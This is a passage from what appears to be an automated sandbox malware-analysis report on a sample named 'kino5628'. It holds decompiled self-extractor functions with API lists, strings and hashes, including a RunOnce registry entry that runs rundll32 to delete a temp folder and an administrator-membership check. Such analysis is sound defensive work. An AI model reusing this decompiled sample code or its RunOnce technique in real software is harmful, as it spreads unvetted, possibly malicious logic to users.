					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E008E1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E008E658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E008E658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0x8e1140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E008E1680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E008E6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}

0x008e2773
0x008e277e
0x008e2785
0x008e278a
0x008e278d
0x008e2790
0x008e2792
0x008e2798
0x008e279d
0x008e28b2
0x00000000
0x008e27a3
0x008e27a3
0x008e27af
0x008e27c2
0x008e27c8
0x008e27cd
0x008e27d5
0x008e28b7
0x008e28b9
0x00000000
0x008e27db
0x008e27dd
0x008e28aa
0x00000000
0x008e27e3
0x008e27e3
0x008e27ec
0x008e27f8
0x008e2803
0x008e280b
0x008e2831
0x008e28c3
0x008e28c9
0x008e28cd
0x008e2837
0x008e285a
0x008e285c
0x008e2865
0x008e2892
0x008e2895
0x00000000
0x00000000
0x008e2867
0x008e2878
0x008e288c
0x00000000
0x008e287a
0x008e2880
0x008e2885
0x008e2897
0x008e2899
0x008e2899
0x008e2878
0x008e2865
0x008e28a0
0x008e28bf
0x008e28c1
0x00000000
0x00000000
0x008e28c1
0x008e2831
0x008e27dd
0x008e27d5
0x008e28e5

APIs

CharUpperA.USER32(AF179A30,00000000,00000000,00000000), ref: 008E27A8
CharNextA.USER32(0000054D), ref: 008E27B5
CharNextA.USER32(00000000), ref: 008E27BC
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008E2829
RegQueryValueExA.ADVAPI32(?,008E1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008E2852
ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008E2870
RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008E28A0
GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 008E28AA
GetSystemDirectoryA.KERNEL32 ref: 008E28B9

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 008E27E4

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: 57a28f942772e1fbabd80a474f976478ac217064ba36fa44cdb595d83cb4b4a5
Instruction ID: 5cdcb096596ae31ec72b9cefba2af750e783aa0a75a1b322a008c35cadbd3a60
Opcode Fuzzy Hash: 57a28f942772e1fbabd80a474f976478ac217064ba36fa44cdb595d83cb4b4a5
Instruction Fuzzy Hash: E7419371A001ACAFDB289B66DC85AFE7BBDFF56700F0040A9F549D6110DB709E858FA1

Uniqueness

Uniqueness Score: -1.00%

Function 008E2267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E008E2267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0x8e8004; // 0xaf179a30
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0x8e8530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E008E658A( &_v268, 0x104, 0x8e1140);
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
							E008E171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E008E6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}

0x008e2272
0x008e2277
0x008e2279
0x008e2283
0x008e2289
0x008e22ab
0x008e22b1
0x008e22c4
0x008e22e0
0x008e22e6
0x008e22f5
0x008e230d
0x008e231c
0x008e231c
0x008e2321
0x008e233a
0x008e2342
0x008e2348
0x008e234b
0x008e234c
0x008e234c
0x008e234e
0x008e234f
0x008e236e
0x008e236e
0x008e237a
0x008e2380
0x008e2380
0x008e2381
0x008e2381
0x008e238f

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 008E22A3
RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 008E22D8
memset.MSVCRT ref: 008E22F5
GetSystemDirectoryA.KERNEL32 ref: 008E2305
RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 008E236E
RegCloseKey.ADVAPI32(?), ref: 008E237A

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 008E2321
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 008E2299
wextract_cleanup1, xrefs: 008E227C, 008E22CD, 008E2363
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 008E232D

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Value$CloseDirectoryOpenQuerySystemmemset
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
API String ID: 3027380567-2048191181
Opcode ID: 2562a6b62d65419b4dbe8f95be98c291672b57c32083cf0f261832d805a777a2
Instruction ID: 702c7369ab3aca94dee974a50caa584d39db35f767549eb05aa691aef1571b43
Opcode Fuzzy Hash: 2562a6b62d65419b4dbe8f95be98c291672b57c32083cf0f261832d805a777a2
Instruction Fuzzy Hash: A931E871A00298ABCB259B56DC89FEE777CFB16740F0001E9B50DEA151EA74AF88CE50

Uniqueness

Uniqueness Score: -1.00%

Function 008E3100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E008E3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0x8e8590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0x8e8590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E008E43D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0x8e8d4c);
					SetWindowTextA(_t33, "doza2");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0x8e88b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E008E30C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}

0x008e3108
0x008e310b
0x008e31b7
0x008e31ca
0x008e31d0
0x008e31d0
0x008e31da
0x00000000
0x008e31da
0x008e3111
0x008e3114
0x008e3136
0x008e3136
0x008e3138
0x008e313b
0x008e3141
0x00000000
0x008e3143
0x008e3116
0x008e311b
0x008e314b
0x008e3151
0x008e3158
0x008e316a
0x008e3176
0x008e317d
0x008e318b
0x008e319e
0x008e31a3
0x00000000
0x008e31ad
0x008e3120
0x00000000
0x00000000
0x008e312a
0x008e3134
0x00000000
0x00000000
0x00000000
0x008e3134
0x008e312c
0x00000000

APIs

EndDialog.USER32(?,00000000), ref: 008E313B
GetDesktopWindow.USER32 ref: 008E314B
SetDlgItemTextA.USER32(?,00000834), ref: 008E316A
SetWindowTextA.USER32(?,doza2), ref: 008E3176
SetForegroundWindow.USER32(?), ref: 008E317D
GetDlgItem.USER32(?,00000834), ref: 008E3185
GetWindowLongA.USER32(00000000,000000FC), ref: 008E3190
SetWindowLongA.USER32(00000000,000000FC,008E30C0), ref: 008E31A3
SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 008E31CA

Strings

doza2, xrefs: 008E3170

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: doza2
API String ID: 3785188418-612509477
Opcode ID: 9c51a8c53585ca9852c953e730414807260fcd241c7afa5f2f74bb9ffae3eb2e
Instruction ID: 4b7253e53c666be854860b26839724a1c933444e95b11ee84cd5506616a64729
Opcode Fuzzy Hash: 9c51a8c53585ca9852c953e730414807260fcd241c7afa5f2f74bb9ffae3eb2e
Instruction Fuzzy Hash: 5711D3312042D5FBDB255F259C8CB6E3A64FB4BB21F110618F926EA1E0DBB5AF41C742

Uniqueness

Uniqueness Score: -1.00%

Function 008E18A3 Relevance: 16.6, APIs: 11, Instructions: 112
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E008E18A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x8e8004; // 0xaf179a30
				_v8 = _t23 ^ _t53;
				_t25 =  *0x8e8128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E008E6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E008E17EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x8e8128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0x8e8128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}

0x008e18a3
0x008e18a3
0x008e18ab
0x008e18b2
0x008e18b5
0x008e18be
0x008e18c0
0x008e18c6
0x008e18c7
0x008e18ca
0x008e18cf
0x008e19c9
0x008e19d8
0x008e19d8
0x008e18df
0x008e19b8
0x008e19bd
0x008e19bf
0x008e19bf
0x00000000
0x008e19bd
0x008e18fa
0x00000000
0x00000000
0x008e1912
0x008e19aa
0x008e19ad
0x008e19b3
0x00000000
0x008e1927
0x008e1927
0x008e1932
0x008e1936
0x008e19a9
0x008e19a9
0x00000000
0x008e19a9
0x008e194c
0x008e19a2
0x008e19a3
0x00000000
0x008e196e
0x008e1970
0x008e1999
0x008e199c
0x00000000
0x008e199c
0x008e1972
0x008e1972
0x008e1975
0x008e1984
0x008e1985
0x008e198a
0x00000000
0x00000000
0x00000000
0x008e198c
0x008e1991
0x008e1996
0x00000000
0x008e1996
0x008e194c

APIs

Part of subcall function 008E17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,008E18DD), ref: 008E181A
Part of subcall function 008E17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 008E182C
Part of subcall function 008E17EE: AllocateAndInitializeSid.ADVAPI32(008E18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,008E18DD), ref: 008E1855
Part of subcall function 008E17EE: FreeSid.ADVAPI32(?,?,?,?,008E18DD), ref: 008E1883
Part of subcall function 008E17EE: FreeLibrary.KERNEL32(00000000,?,?,?,008E18DD), ref: 008E188A

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 008E18EB
OpenProcessToken.ADVAPI32(00000000), ref: 008E18F2
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 008E190A
GetLastError.KERNEL32 ref: 008E1918
LocalAlloc.KERNEL32(00000000,?,?), ref: 008E192C
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 008E1944
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 008E1964
EqualSid.ADVAPI32(00000004,?), ref: 008E197A
FreeSid.ADVAPI32(?), ref: 008E199C
LocalFree.KERNEL32(00000000), ref: 008E19A3
CloseHandle.KERNEL32(?), ref: 008E19AD

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: da95440e2b11d63136e5c8395913c48cd678b28f0dbc2f42c2e9358f979f69b8
Instruction ID: 79a2bc52ff519eee319dcbc9af60014ccb36676a24eec4d2358aef1ccd92f16a
Opcode Fuzzy Hash: da95440e2b11d63136e5c8395913c48cd678b28f0dbc2f42c2e9358f979f69b8
Instruction Fuzzy Hash: CE311C71A00289EFDF10AFA6DC98AAFBFBCFF05750F500429E546E6151DB319905CB61

Uniqueness

Uniqueness Score: -1.00%

Function 008E468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E008E468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}

0x008e4699
0x008e469b
0x008e46a9
0x008e46af
0x008e46b4
0x008e46bc
0x008e46f9
0x00000000
0x008e46f9
0x008e46d9
0x008e46dd
0x00000000
0x00000000
0x008e46e5
0x008e46ef
0x00000000
0x008e46f5
0x008e46ff

APIs

FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008E46A0
SizeofResource.KERNEL32(00000000,00000000,?,008E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46A9
FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008E46C3
LoadResource.KERNEL32(00000000,00000000,?,008E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46CC
LockResource.KERNEL32(00000000,?,008E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46D3
memcpy_s.MSVCRT ref: 008E46E5
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46EF

Strings

doza2, xrefs: 008E46E4
TITLE, xrefs: 008E469D, 008E46C0

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID: TITLE$doza2
API String ID: 3370778649-4167907646
Opcode ID: 7f259268739929a5248ddd311fb4a1b0d268de8ad943ca4a58283bcd8fc13433
Instruction ID: 2e6473cc96ca2d6021fa66aa712633fe3f11f5d04403b99ecb06301abdf56ada
Opcode Fuzzy Hash: 7f259268739929a5248ddd311fb4a1b0d268de8ad943ca4a58283bcd8fc13433
Instruction Fuzzy Hash: 5701F9362482807BF3241BA65C8CF2B3E2CFBD7F61F054014FA4EDB150C971984082B2

Uniqueness

Uniqueness Score: -1.00%

Function 008E17EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E008E17EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0x8e8004; // 0xaf179a30
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0x8ea288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E008E6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}

0x008e17f6
0x008e17fd
0x008e1805
0x008e180b
0x008e180d
0x008e1815
0x008e1818
0x008e1820
0x008e1824
0x008e182c
0x008e1832
0x008e1837
0x008e1851
0x008e1854
0x008e185d
0x008e1862
0x008e186c
0x008e1872
0x008e1877
0x008e187e
0x008e187e
0x008e1883
0x008e1883
0x008e185d
0x008e188a
0x008e188a
0x008e18a2

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,008E18DD), ref: 008E181A
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 008E182C
AllocateAndInitializeSid.ADVAPI32(008E18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,008E18DD), ref: 008E1855
FreeSid.ADVAPI32(?,?,?,?,008E18DD), ref: 008E1883
FreeLibrary.KERNEL32(00000000,?,?,?,008E18DD), ref: 008E188A

Strings

CheckTokenMembership, xrefs: 008E1826
advapi32.dll, xrefs: 008E1810

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: 903d0043ee8edf01fde51e9af83548b7e7da88bc43559ebd8c90d88a8ffb9199
Instruction ID: 7d95a2cee73464281564dedfe6a022ff2060b714ac0f59628b41ac7a92ed271e
Opcode Fuzzy Hash: 903d0043ee8edf01fde51e9af83548b7e7da88bc43559ebd8c90d88a8ffb9199
Instruction Fuzzy Hash: CE119331E00249EBDB149FA5DC89ABEBB78FF45710F100169FA16E6290DB309D00CB91

Uniqueness

Uniqueness Score: -1.00%

Function 008E3450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008E3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E008E43D0(_t24, _t12);
					SetWindowTextA(_t24, "doza2");
					SetDlgItemTextA(_t24, 0x838,  *0x8e9404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0x8e91dc = 1;
					goto L8;
				}
				return 0;
			}

0x008e3459
0x008e345c
0x008e34d8
0x008e34de
0x00000000
0x008e34e0
0x008e345e
0x008e3463
0x008e349a
0x008e34a0
0x008e34a7
0x008e34b2
0x008e34c4
0x008e34cb
0x00000000
0x008e34cb
0x008e3468
0x008e346e
0x008e3474
0x00000000
0x00000000
0x008e347c
0x008e348c
0x008e3490
0x00000000
0x008e3496
0x008e3484
0x00000000
0x00000000
0x008e3486
0x00000000
0x008e3486
0x00000000

APIs

EndDialog.USER32(?,?), ref: 008E3490
GetDesktopWindow.USER32 ref: 008E349A
SetWindowTextA.USER32(?,doza2), ref: 008E34B2
SetDlgItemTextA.USER32(?,00000838), ref: 008E34C4
SetForegroundWindow.USER32(?), ref: 008E34CB
EndDialog.USER32(?,00000002), ref: 008E34D8

Strings

doza2, xrefs: 008E34AC

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Window$DialogText$DesktopForegroundItem
String ID: doza2
API String ID: 852535152-612509477
Opcode ID: 0ed3855ff383c4a76df24f9b18c017732a1b11a825d16110baeab3ca5d5a6274
Instruction ID: acca7d6d3bb1bef82f0d051ec8054421ca506dd5912e17104ebb4ee14141fca7
Opcode Fuzzy Hash: 0ed3855ff383c4a76df24f9b18c017732a1b11a825d16110baeab3ca5d5a6274
Instruction Fuzzy Hash: 7101B1312401D8ABC71A5F6ADC4C96D3A64FB57B09F008014F947DB6E0CB71AF41CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 008E2AAC Relevance: 12.1, APIs: 8, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E008E2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0x8e8004; // 0xaf179a30
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0x8e9a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E008E1680(_t65, E008E17C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
